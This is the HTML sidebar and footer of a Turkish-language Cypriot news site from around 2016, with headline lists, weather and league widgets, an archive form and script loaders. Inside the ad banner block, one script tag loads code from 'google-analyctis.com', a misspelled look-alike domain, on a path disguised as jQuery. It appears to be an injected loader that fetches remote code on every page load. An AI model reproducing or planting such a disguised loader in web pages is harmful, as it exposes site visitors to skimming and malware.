                            <a href="/milli-egitim-bakani-omer-dincerin-yonetim-anlayisi-makale,532.html" class="yazar" title="Hasan Güneş">Hasan Güneş</a>
                            <a href="/milli-egitim-bakani-omer-dincerin-yonetim-anlayisi-makale,532.html" class="son-yazi" title="Milli Eğitim Bakanı Ömer Dinçer&#039;in Yönetim Anlayışı">Milli Eğitim Bakanı Ömer Dinçer’in Yönetim Anlayışı</a>        
                        </li>
                                                                        <!-- author article -->
                        <li class="article">
                            <img src="http://www.kibristahaber.com/images/yazarlar/thumbs/651_b.jpg" alt="Müslüm Yaşargün" />
                            <a href="/medya-ve-biz…-makale,524.html" class="yazar" title="Müslüm Yaşargün">Müslüm Yaşargün</a>
                            <a href="/medya-ve-biz…-makale,524.html" class="son-yazi" title="Medya ve Biz…">Medya ve Biz…</a>        
                        </li>
                                                                        
                  </ul>
                  <!-- seperator -->

              </div>
                <!-- slider items -->
            
            </div>
            <!-- scroll -->
        
            <!-- navigations -->
            <div class="slider_navigation">
                <a class="browse prev"></a>
                <a class="browse next"></a>
                
                <div class="navi"></div>
            
            </div>
            <!-- navigations -->
            
        
          </div>
          <!-- authors -->

	  
	        <!-- newspaper 
        <div class="sagBlok gazeteMansetleri">
            <select name="gazete" onchange="gazete_goster(this.value)" class="fright">
                <option value="">-- Gazete Seçiniz --</option>
							<option value="">Gazete Seçiniz</option>

							<option value="aksam">Akşam</option>

							<option value="birgun">Birgün</option>

							<option value="bugun">Bugün</option>

							<option value="cumhuriyet">Cumhuriyet</option>

							<option value="dunya">Dünya</option>

							<option value="fanatik">Fanatik</option>

							<option value="gunes">Güneş</option>

							<option value="haberturk">Habertürk</option>

							<option value="hurriyet">Hürriyet</option>

							<option value="milligazete">Milli Gazete</option>

							<option value="milliyet">Milliyet</option>

							<option value="posta">Posta</option>

							<option value="radikal">Radikal</option>

							<option value="sabah">Sabah</option>

							<option value="sozcu">Sözcü</option>

							<option value="star">Star</option>

							<option value="takvim">Takvim</option>

							<option value="taraf">Taraf</option>

							<option value="turkiye">Türkiye</option>

							<option value="vakit">Vakit</option>

							<option value="vatan">Vatan</option>

							<option value="yeniasya">Yeni Asya</option>

							<option value="yenisafak">Yeni Şafak</option>

							<option value="zaman">Zaman</option>

			            </select>
        </div>
        <!-- newspaper -->



    
	        <!-- last minute -->
    	<div class="sagBlok sonDakika">
			<div class="sagBaslik">
				<span class="baslik">Son Dakika</span>
			</div>
			<div class="sagHaberListe">
            <ul>
				<li><a href="/guncel/ankarayi-kana-bulayan-teroristle-ilgili-ilk-iddia-suriyeli-salih-nacar-h159404.html" title="Ankara&#039;yı Kana Bulayan Teröristle İlgili">Ankara’yı Kana Bulayan Teröristle İlgili</a></li>
				<li><a href="/guncel/perde-aralaniyor-ankarayi-kana-bulayan-arac-ortaya-cikti-h159403.html" title="Perde Aralanıyor Ankara&#039;yı Kana Bulayan Araç">Perde Aralanıyor Ankara’yı Kana Bulayan Araç</a></li>
				<li><a href="/guncel/efkan-ala-ankara-saldirisindan-4-saat-sonra-iki-cumlelik-aciklama-yapti-h159402.html" title="Efkan Ala, Ankara Saldırısından 4 Saat Sonra">Efkan Ala, Ankara Saldırısından 4 Saat Sonra</a></li>
				<li><a href="/spor/4-buyuklerden-terore-lanet-mesaji-h159401.html" title="4 Büyüklerden Teröre Lanet Mesajı">4 Büyüklerden Teröre Lanet Mesajı</a></li>
				<li><a href="/spor/ridvan-dilmen-ankaradaki-saldirinin-ardindan-mac-yorumu-yapmadi-h159400.html" title="Rıdvan Dilmen, Ankara&#039;daki Saldırının">Rıdvan Dilmen, Ankara’daki Saldırının</a></li>
				<li><a href="/guncel/erdogan-mesru-mudafaa-hakkimizi-cekinmeden-kullanacagiz-h159399.html" title="Erdoğan: Meşru Müdafaa Hakkımızı">Erdoğan: Meşru Müdafaa Hakkımızı</a></li>
				<li><a href="/guncel/erdogan-sinirimizda-yeni-bir-kandilin-olusmasina-asla-izin-vermeyecegiz-h159368.html" title="Erdoğan: Sınırımızda Yeni Bir Kandil&#039;in">Erdoğan: Sınırımızda Yeni Bir Kandil’in</a></li>
				<li><a href="/spor/besiktasli-mario-gomez-senol-gunesin-elini-sikmadi-h159398.html" title="Beşiktaşlı Mario Gomez, Şenol Güneş&#039;in">Beşiktaşlı Mario Gomez, Şenol Güneş’in</a></li>
		            </ul>
            </div>        
        </div>
        <!-- last minute -->
	

			<div id="bl_6">
			<div class="ad300" id="bannerDiv6" style="margin-bottom:5px">
				<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
 style="display:inline-block;width:300px;height:250px"
 data-ad-client="ca-pub-7575455318362213"
 data-ad-slot="2493419255"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
			</div>
		</div>
	    
	        <!-- private news -->
    	<div class="sagBlok ozelHaber">
			<div class="sagBaslik">
				<span class="baslik">Özel Haber</span>
			</div>
			<div class="sagHaberListe">
            <ul>
				<li><a href="/yasam/smile-clinic-dis-beyazlatici-kullanmanin-faydalari-h156329.html" title="Smile Clinic Diş Beyazlatıcı Kullanmanın Faydaları">Smile Clinic Diş Beyazlatıcı Kullanmanın Faydaları </a></li>
				<li><a href="/ads/cin-takvimine-gore-yas-hesaplama-ve-hamilelik-planlama-h156328.html" title="Çin Takvimine Göre Yaş Hesaplama ve Hamilelik Planlama">Çin Takvimine Göre Yaş Hesaplama ve Hamilelik Planlama</a></li>
				<li><a href="/OSMANİYE/osmaniyede-elektrik-kesintisi-h156111.html" title="Osmaniye&#039;de Elektrik Kesintisi">Osmaniye’de Elektrik Kesintisi</a></li>
				<li><a href="/afyonkarahisar/sultandaginda-engelliler-ilk-kez-kaymakamlik-makamina-cikti-h156051.html" title="Sultandağı&#039;nda Engelliler İlk Kez Kaymakamlık Makamına">Sultandağı’nda Engelliler İlk Kez Kaymakamlık Makamına</a></li>
				<li><a href="/asayis/80lik-delikanlilar-askere-gitmek-icin-basvurdu-h154661.html" title="80&#039;lik Delikanlılar Askere Gitmek İçin Başvurdu">80’lik Delikanlılar Askere Gitmek İçin Başvurdu</a></li>
				<li><a href="/genel/alanyada-irlandali-turiste-su-beles-h154546.html" title="Alanya&#039;da İrlandalı Turiste &#039;Su Beleş&#039;">Alanya’da İrlandalı Turiste ’Su Beleş’</a></li>
				<li><a href="/gundem/belediyenin-kamyonundan-100-kg-bomba-cikti-h154503.html" title="Belediyenin kamyonundan 100 kg bomba çıktı">Belediyenin kamyonundan 100 kg bomba çıktı</a></li>
				<li><a href="/gundem/mutlu-kaya-ilk-kez-ayaga-kalkti-h154488.html" title="Mutlu Kaya ilk kez ayağa kalktı">Mutlu Kaya ilk kez ayağa kalktı</a></li>
				<li><a href="/gundem/silvanda-sokaga-cikma-yasagi-ilan-edildi-h154487.html" title="Silvan&#039;da sokağa çıkma yasağı ilan edildi">Silvan’da sokağa çıkma yasağı ilan edildi</a></li>
				<li><a href="/gundem/iste-zekeriya-oz-ve-celal-karanin-kaldigi-otel-h154484.html" title="İşte Zekeriya Öz ve Celal Kara&#039;nın kaldığı otel">İşte Zekeriya Öz ve Celal Kara'nın kaldığı otel</a></li>
		            </ul>
            </div>        
        </div>
        <!-- private news -->
	

	        <!-- weather -->

	<div class="sagBlok block weather">
	    	<div class="sagBaslik">
				<span class="selectBox">
                <select name="hava" onchange="hava_durumu(this.value, '3');">
                	                	<option value="TUXX0061">Adana</option>
			                	<option value="9267066">Adıyaman</option>
			                	<option value="TUXX0046">Afyon</option>
			                	<option value="771">Ağrı</option>
			                	<option value="901">Aksaray</option>
			                	<option value="1412">Amasya</option>
			                	<option value="TUXX0002">Ankara</option>
			                	<option value="TUXX0004">Antalya</option>
			                	<option value="1885">Ardahan</option>
			                	<option value="9264197">Artvin</option>
			                	<option value="TUXX0051">Aydın</option>
			                	<option value="TUXX0041">Balıkesir</option>
			                	<option value="3037">Bartın</option>
			                	<option value="9261679">Batman</option>
			                	<option value="3200">Bayburt</option>
			                	<option value="3946">Bilecik</option>
			                	<option value="9260548">Bingöl</option>
			                	<option value="4045">Bitlis</option>
			                	<option value="TUXX0032">Bolu</option>
			                	<option value="5249">Burdur</option>
			                	<option value="TUXX0039">Bursa</option>
			                	<option value="TUXX0037">Çanakkale</option>
			                	<option value="9258078">Çankırı</option>
			                	<option value="TUXX0033">Çorum</option>
			                	<option value="8899">Denizli</option>
			                	<option value="TUXX0010">Diyarbakır</option>
			                	<option value="9252670">Düzce</option>
			                	<option value="TUXX0030">Edirne</option>
			                	<option value="TUXX0049">Elazığ</option>
			                	<option value="TUXX0035">Erzincan</option>
			                	<option value="TUXX0013">Erzurum</option>
			                	<option value="TUXX0040">Eskişehir</option>
			                	<option value="TUXX0055">Gaziantep</option>
			                	<option value="12125">Giresun</option>
			                	<option value="9248871">Gümüşhane</option>
			                	<option value="9255950">Hakkari</option>
			                	<option value="1694">Hatay</option>
			                	<option value="9245907">Iğdır</option>
			                	<option value="TUXX0052">Isparta</option>
			                	<option value="TUXX0014">İstanbul</option>
			                	<option value="TUXX0015">İzmir</option>
			                	<option value="15888">Kahramanmaraş</option>
			                	<option value="9243604">Karabük</option>
			                	<option value="16174">Karaman</option>
			                	<option value="16274">Kastamonu</option>
			                	<option value="16345">Kayseri</option>
			                	<option value="TUXX0019">Kırıkkale</option>
			                	<option value="16847">Kırklareli</option>
			                	<option value="TUXX0042">Kırşehir</option>
			                	<option value="16700">Kilis</option>
			                	<option value="TUXX0017">Kocaeli</option>
			                	<option value="TUXX0053">Konya</option>
			                	<option value="17542">Kütahya</option>
			                	<option value="19917">Malatya</option>
			                	<option value="20103">Manisa</option>
			                	<option value="20271">Mardin</option>
			                	<option value="14693">Mersin</option>
			                	<option value="TUXX0057">Muğla</option>
			                	<option value="TUXX0062">Muş</option>
			                	<option value="TUXX0065">Nevşehir</option>
			                	<option value="23341">Niğde</option>
			                	<option value="24553">Ordu</option>
			                	<option value="24703">Osmaniye</option>
			                	<option value="27911">Rize</option>
			                	<option value="TUXX0022">Sakarya</option>
			                	<option value="TUXX0023">Samsun</option>
			                	<option value="TUXX0050">Siirt</option>
			                	<option value="30965">Sinop</option>
			                	<option value="TUXX0034">Sivas</option>
			                	<option value="34552">Şanlıurfa</option>
			                	<option value="10034630">Şırnak</option>
			                	<option value="TUXX0031">Tekirdağ</option>
			                	<option value="33558">Tokat</option>
			                	<option value="TUXX0029">Trabzon</option>
			                	<option value="9226242">Tunceli</option>
			                	<option value="TUXX0045">Uşak</option>
			                	<option value="TUXX0043">Van</option>
			                	<option value="9250659">Yalova</option>
			                	<option value="37318">Yozgat</option>
			                	<option value="TUXX0028">Zonguldak</option>
			                	<option value="10208812">Kıbrıs</option>
			                	<option value="10700">Famagusta</option>
			                	<option value="23317" selected="selected">Girne</option>
			                	<option value="7261129">Güzelyurt</option>
			                	<option value="23317" selected="selected">Lefkoşa</option>
			                </select>
				</span>
				<span class="baslik">Hava Durumu</span>
			</div>
	    <div class="sonuc"></div>

        </div>
        <!-- weather -->
	
	

	
	        <!-- super lig -->
	<div class="block superlig">
	    <h1><span>SPOR TOTO SÜPER LİG</span></h1>
            <div class="content">
            	<div class="padding">
            	Tür seçiniz:<br />
                <select name="puan" onchange="futbol(this.value);">
                	<option value="puan">Puan Cetveli</option>
                	<option value="fikstur">Ligde Bu Hafta</option>
                </select>

		 <div class="futbol"></div>
                
                </div>
            
            </div>
            
        </div>
        <!-- super lig -->
	
	        <!-- pages -->
		<div class="sagBlok">
			<div class="sagBaslik">
	    	<span class="baslik">Sayfalar</span>
            </div>
                    <ul class="list">
						<li><a href="/acil-telefonlar-s5.html" title="Acil Telefonlar">Acil Telefonlar</a></li>
			                    </ul>
        </div>
        <!-- pages -->
	

	

		
					<!-- e-newspaper -->
		<div class="sagBlok2" style="margin-right: 10px;">
		<div class="sagBaslik2 sol">
	    <span class="baslik">E-Gazete</span>
        </div>
		    <ul class="content" style="border-bottom: 1px solid #ccc;border-right: 1px solid #ccc;">
							<li><a href="/images/sayfalar/41940.jpg" title="Kıbrıs Haber - En Son Kıbrıs Haberleri ve KKTC Gelişmeleri - 18 Haziran 2015 Manşeti" target="_blank"><img src="/images/sayfalar/thumb_41940.jpg" alt="Kıbrıs Haber - En Son Kıbrıs Haberleri ve KKTC Gelişmeleri - 18 Haziran 2015 Manşeti" /></a></li>
					    
		    </ul>
		</div>
		<!-- e-newspaper -->
		
				<!-- who is who -->
		<div class="sagBlok2">
		<div class="sagBaslik2 sag">
	    <span class="baslik"><a href="/biyografiler.html" style="color: white;">Kim Kimdir?</a></span>
        </div>
		    <ul class="content" style="border-bottom: 1px solid #ccc;border-left: 1px solid #ccc;">
						<li><a href="/-muhsin-yazicioglu-biyografi,4.html" title=" Muhsin Yazıcıoğlu" class="biyografi"><img src="/images/biyografi/muhsin-yazicioglu.jpg" alt="Muhsin Yazıcıoğlu" /><b> Muhsin Yazıcıoğlu</b></a></li>   
							     
		    </ul>
		    
		</div>
		<!-- who is who -->
			
	

	


	<div class="cboth"></div>

	
	

        <!-- archive -->
	<div class="archive">
	    <span class="baslik">Arşiv</span>
            <div class="content">
            	<form action="/?m=arsiv" method="post" style="margin:0">
		<p>
                    <select name="gun" class="day">
						  <option value="01" >01</option>
						  <option value="02" >02</option>
						  <option value="03" >03</option>
						  <option value="04" >04</option>
						  <option value="05" >05</option>
						  <option value="06" >06</option>
						  <option value="07" >07</option>
						  <option value="08" >08</option>
						  <option value="09" >09</option>
						  <option value="10" >10</option>
						  <option value="11" >11</option>
						  <option value="12" >12</option>
						  <option value="13" >13</option>
						  <option value="14" >14</option>
						  <option value="15" >15</option>
						  <option value="16" >16</option>
						  <option value="17" >17</option>
						  <option value="18" >18</option>
						  <option value="19" >19</option>
						  <option value="20" >20</option>
						  <option value="21" >21</option>
						  <option value="22" >22</option>
						  <option value="23" >23</option>
						  <option value="24" >24</option>
						  <option value="25" >25</option>
						  <option value="26" >26</option>
						  <option value="27" >27</option>
						  <option value="28" >28</option>
						  <option value="29" >29</option>
						  <option value="30" >30</option>
						  <option value="31" >31</option>
			                    </select>
                    <select name="ay" class="month">
						  <option value="01" >Ocak</option>
						  <option value="02" >Şubat</option>
						  <option value="03" >Mart</option>
						  <option value="04" >Nisan</option>
						  <option value="05" >Mayıs</option>
						  <option value="06" >Haziran</option>
						  <option value="07" >Temmuz</option>
						  <option value="08" >Ağustos</option>
						  <option value="09" >Eylül</option>
						  <option value="10" >Ekim</option>
						  <option value="11" >Kasım</option>
						  <option value="12" >Aralık</option>
			                    </select>
                    <select name="yil" class="year">
						  <option value="2016" >2016</option>
						  <option value="2015" >2015</option>
						  <option value="2014" >2014</option>
						  <option value="2013" >2013</option>
						  <option value="2012" >2012</option>
						  <option value="2011" >2011</option>
			                    </select>
                    <input type="image" src="/_themes/hs-live/images/button_getir.png" value="" class="button fright" />
		   </p>
                </form>
            
            </div>
        </div>
        <!-- archive -->
		</div>

		<!-- Right Block -->
	
	<div class="clear"></div>
<div class="clear"></div>

	<!-- Footer -->
	<div id="footer">
		
		<div class="footer1">
			<div class="harita">
			
				<!-- Footer Logo -->
				<div class="footerLogo">
					<a href="http://www.kibristahaber.com/" class="logo"><img src="http://www.kibristahaber.com/images/banner/kibris-haber-kktc-logo_1.png" alt=" USB Flash Bellek Nasıl Formatlanır?" /></a>
				</div>
				<!--#Footer Logo -->
				
				<!-- Footer Sosyal -->
				<div class="footerSosyal">
					<ul>
						<li><a href=""><img src="/_themes/hs-live/images/v6/facebook.png" alt=""/></a></li>
						<li><a href=""><img src="/_themes/hs-live/images/v6/twitter.png" alt=""/></a></li>
						<li><a href="/rss.php"><img src="/_themes/hs-live/images/v6/rss.png" alt=""/></a></li>
					</ul>
				</div>
				<!--#Footer Sosyal -->
				
				<!-- Footer Menü -->
				<div class="footerMenu">
				<ul class="fmLink">
					<li><a href="/index.html" title="Ana Sayfa">ANA SAYFA</a></li>
					<li><a href="/foto-galeri.html" title="Foto Galeri">FOTO GALERİ</a></li>
					<li><a href="/video-galeri.html" title="Video Galeri">VİDEO GALERİ</a></li>
					<li><a href="/yazarlar.html" title="Yazarlar">YAZARLAR</a></li>
					<li><a href="/seri-ilanlar" title="Seri İlanlar">SERİ İLANLAR</a></li>
					<li><a href="/firma-rehberi" title="Firma Rehberi">FİRMA REHBERİ</a></li>
                </ul>
				<ul class="fmCat">
					<li class="kategori0"><a href="/gundem" >GÜNDEM</a></li><li class="kategori1"><a href="/turkiye" >TÜRKİYE</a></li><li class="kategori2"><a href="/kibris" >KIBRIS</a></li><li class="kategori3"><a href="/ingiltere" >İNGİLTERE</a></li><li class="kategori4"><a href="/dunya" >DÜNYA</a></li><li class="kategori5"><a href="/spor" >SPOR</a></li><li class="kategori6"><a href="/magazin" >MAGAZİN</a></li><li class="kategori7"><a href="/ekonomi" >EKONOMİ</a></li><li class="kategori8"><a href="/teknoloji" >TEKNOLOJİ</a></li><li class="kategori9"><a href="/kadin" >KADIN</a></li><li class="kategori10"><a href="/kultur" >KÜLTÜR</a></li><li class="kategori11"><a href="/yasam" >YAŞAM</a></li><li class="kategori12"><a href="/saglik" >SAĞLIK</a></li><li class="kategori13"><a href="/egitim" >EĞİTİM</a></li><li class="kategori14"><a href="/siyaset" >SİYASET</a></li><li class="kategori15"><a href="/medya" >MEDYA</a></li><li class="kategori16"><a href="/eglence" >EĞLENCE</a></li>
                </ul>
				</div>
				<!--#Footer Menü -->
			
			</div>
		</div>
		
		<div class="footer2">
			<ul>
				<li><a href="#" onclick="favori_ekle('http://www.kibristahaber.com/','USB Flash Bellek Nasıl Formatlanır?');">Favorilere Ekle</a></li>
				<li><a href="/uyelik.html">Üye Ol</a></li>
				<li><a href="/login.html">Üye Girişi</a></li>
				<li><a href="/m/">Mobil</a></li>
				<li><a href="/kunye.html" title="Künye">Künye</a></li>
				<li><a href="/iletisim.html" title="Reklam">Reklam</a></li>
				<li><a href="/iletisim.html" title="İletişim">İletişim</a></li>
			</ul>
		</div>
		
		<div class="footer3"> 
			<div class="fSag"> 
			 
			</div>
			<div class="fSol">
			2016 © Copyright | Kibristahaber.com 2012
			</div>
		</div>
		
	</div>
	<!--#Footer -->
<!-- Right Ad Areas -->
<div class="right_ad_areas">
                            
                                                                                                                                                                    </div> 
<!-- Right Ad Areas -->
<center>
</div>
<!-- Container -->


<script type="text/javascript">
	var site_url   = '/';
	var tema       = 'hs-live';
	var theme_path = '/_themes/hs-live/';
	var ajax_url   = '_ajax/';
	var cat_limit  = '11';
	var poll_voted = '0';
	//var block_order= '';
	var mostly_reading_active = '2';
	var mostly_comment_active = '2';
	var comment_approved = '0';
	var doviz    = '1';
	var lazyload = '1';
	var ortala   = '1';
	var hava   = '1';
	var hava_default   = '23317';
	var namaz   = '0';
	var namaz_default   = 'adana';
	var superlig   = '1';
</script>




<script src="/_themes/hs-live/js/yepnope.1.5.4-min.js"></script>
<script>
	yepnope({
		load: [
			'https://code.jquery.com/jquery-1.6.4.min.js',
			'/_themes/hs-live/js/TE_library.js',
			'/_themes/hs-live/js/jquery.idTabs.min.js',
			'/_themes/hs-live/js/jquery.validate.js',
			'/_themes/hs-live/js/pTab.js',
			'/_themes/hs-live/js/site.js',
			'/_themes/hs-live/js/comments.js'
			
		],



		complete : function(){  
		      
			$(function(){  
				$.getScript('http://platform.twitter.com/widgets.js');
				$.getScript('http://www.google-analytics.com/ga.js');
								
				if (typeof (FB) != 'undefined') {
					FB.init({ status: true, cookie: true, xfbml: true });
				} else {
					$.getScript("http://connect.facebook.net/tr_TR/all.js#xfbml=1", function () {
						FB.init({ status: true, cookie: true, xfbml: true });
					});
				}

				if (typeof (gapi) != 'undefined') {
					gbuttons.each(function () {
						gapi.plusone.render($(this).get(0));
					});
				} else {
					$.getScript('https://apis.google.com/js/plusone.js');
				}

                


			});
			
		      
		 }  




	});

</script>

<!--[if gte IE 9]>
<script type="text/javascript">
Cufon.set('engine', 'canvas');
</script>
<![endif]-->



</body>
</html>


